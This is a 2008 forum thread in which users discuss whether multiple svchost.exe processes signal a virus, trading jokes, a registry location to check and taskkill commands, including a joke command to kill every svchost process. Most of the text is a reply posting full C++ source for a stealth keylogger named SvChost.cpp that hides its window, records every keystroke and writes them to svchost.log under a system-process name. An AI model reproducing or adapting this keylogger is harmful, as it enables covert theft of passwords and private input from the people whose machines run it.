sc0rpi0 Posted January 7, 2008 Posted January 7, 2008 I just checked my taskmanager and there are 8 incidents of svchost.exe. Does this probably mean I have a virus? Quote
SomeoneE1se Posted January 7, 2008 Posted January 7, 2008 yes best way check google on how to remove it Quote
digip Posted January 7, 2008 Posted January 7, 2008 yes best way check google on how to remove it :shock: Oh nooooos...I must have a virus as well... Quote
felony_destined Posted January 8, 2008 Posted January 8, 2008 yeah, I've had that before but what scared me the most was the part that said 'host' (svcHOST.exe) what am I hosting? I certainly hope not any type of remote access service. Quote
Sparda Posted January 8, 2008 Posted January 8, 2008 :shock: Oh nooooos...I must have a virus as well... I has a init! I has to reinstall my Kubuntu! Quote
K1u Posted January 11, 2008 Posted January 11, 2008 It is normal to have various instances of svchost... it maintains several internal processes so it is normal to have various running. Does this mean that it is safe? Absolutely not, someone could have easily created a application to name itself as svchost.exe and make itself a SYSTEM process. How will you ever know the difference? Well... AV's, etc... may detect some differences in specific things of the process. Is it possible to make it undetectable by AV's? Yes. Quote
arran Posted January 11, 2008 Posted January 11, 2008 Multiple instances of svchost.exe doesn't necessarily mean your infected with a virus. Anyway just to be sure check entries under HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSvcHost http://support.microsoft.com/kb/314056 Â Quote
sablefoxx Posted January 18, 2008 Posted January 18, 2008 Just "taskkill /f /im svchost.exe" see what happens, if nothing bad does, it was a virus move tho the next one, hehe. (jk) Quote
digip Posted January 18, 2008 Posted January 18, 2008 (jk) Yeah, its going to kill all of them including the legit ones and cause a reboot. You can use the PID though instead to go one at a time to make sure its a legit file. Kill only the one in question. TASKKILL /F /PID 1234 /T where 1234 is the PID of the program in question and T kills any processes started by the rougue program. Quote
SomeoneE1se Posted January 18, 2008 Posted January 18, 2008 in the end you have a virus you phail at keeping you computer clean, go get some antivirus Quote
sablefoxx Posted January 19, 2008 Posted January 19, 2008 It is normal to have various instances of svchost... it maintains several internal processes so it is normal to have various running. Does this mean that it is safe? Absolutely not, someone could have easily created a application to name itself as svchost.exe and make itself a SYSTEM process. You mean like this:     /*########################################################## ## SvChost.cpp                      ## ## Writen by Ep$sil0n                    ## ## Language C Plus Plus                   ## ## Features Stealth Keyloggger, Writes to file SvChost.log## ###########################################################*/ #include <windows.h> #include <stdio.h> #include <winuser.h> #include <windowsx.h> #define BUFSIZE 80 int test_key(void); int create_key(char *); int get_keys(void); int main(void) {   HWND stealth; /*creating stealth (window is not visible)*/   AllocConsole();   stealth=FindWindowA("ConsoleWindowClass",NULL);   ShowWindow(stealth,0);          int get_keys();     return get_keys(); } int get_keys(void) {       short character;        while(1)        {             Sleep(10); // dont want 100% cpu usage             for(character=8;character<=222;character++)             {               if(GetAsyncKeyState(character)==-32767)               {                                   FILE *file;                 file=fopen("svchost.log","a+"); //create file to write to                 if(file==NULL)                 {                     return 1; // return an error if anything goes wrong                 }                      if(file!=NULL)   // if the file was created or was there                 {        // go on with the keylogger                     if((character>=39)&&(character<=64))                     {                        fputc(character,file);                        fclose(file);                        break;                     }                        else if((character>64)&&(character<91))                     {                        character+=32;                        fputc(character,file);                        fclose(file);                        break;                     }                     else                     {                       switch(character)      //pretty self explanatory                       {                          case VK_SPACE:                          fputc(' ',file);                          fclose(file);                          break;                           case VK_SHIFT:                          fputs("[SHIFT]",file);                          fclose(file);                          break;                                               case VK_RETURN:                          fputs("n[ENTER]",file);                          fclose(file);                          break;                          case VK_BACK:                          fputs("[BACKSPACE]",file);                          fclose(file);                          break;                          case VK_TAB:                          fputs("[TAB]",file);                          fclose(file);                          break;                          case VK_CONTROL:                          fputs("[CTRL]",file);                          fclose(file);                          break;                           case VK_DELETE:                          fputs("[DEL]",file);                          fclose(file);                          break;                          case VK_OEM_1:                          fputs("[;:]",file);                          fclose(file);                          break;                          case VK_OEM_2:                          fputs("[/?]",file);                          fclose(file);                          break;                          case VK_OEM_3:                          fputs("[`~]",file);                          fclose(file);                          break;                          case VK_OEM_4:                          fputs("[ [{ ]",file);                          fclose(file);                          break;                          case VK_OEM_5:                          fputs("[|]",file);                          fclose(file);                          break;                                         case VK_OEM_6:                          fputs("[ ]} ]",file);                          fclose(file);                          break;                          case VK_OEM_7:                          fputs("['"]",file);                          fclose(file);                          break;                          case VK_NUMPAD0:                          fputc('0',file);                          fclose(file);                          break;                          case VK_NUMPAD1:                          fputc('1',file);                          fclose(file);                          break;                          case VK_NUMPAD2:                          fputc('2',file);                          fclose(file);                          break;                          case VK_NUMPAD3:                          fputc('3',file);                          fclose(file);                          break;                          case VK_NUMPAD4:                          fputc('4',file);                          fclose(file);                          break;                          case VK_NUMPAD5:                          fputc('5',file);                          fclose(file);                          break;                          case VK_NUMPAD6:                          fputc('6',file);                          fclose(file);                          break;                          case VK_NUMPAD7:                          fputc('7',file);                          fclose(file);                          break;                          case VK_NUMPAD8:                          fputc('8',file);                          fclose(file);                          break;                          case VK_NUMPAD9:                          fputc('9',file);                          fclose(file);                          break;                          case VK_CAPITAL:                          fputs("[CAPS LOCK]",file);                          fclose(file);                          break;                          default:                          fclose(file);   //close the file                          break;                     }                       }                 }              }          }                           }       return EXIT_SUCCESS;    //exit success :D          }  Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.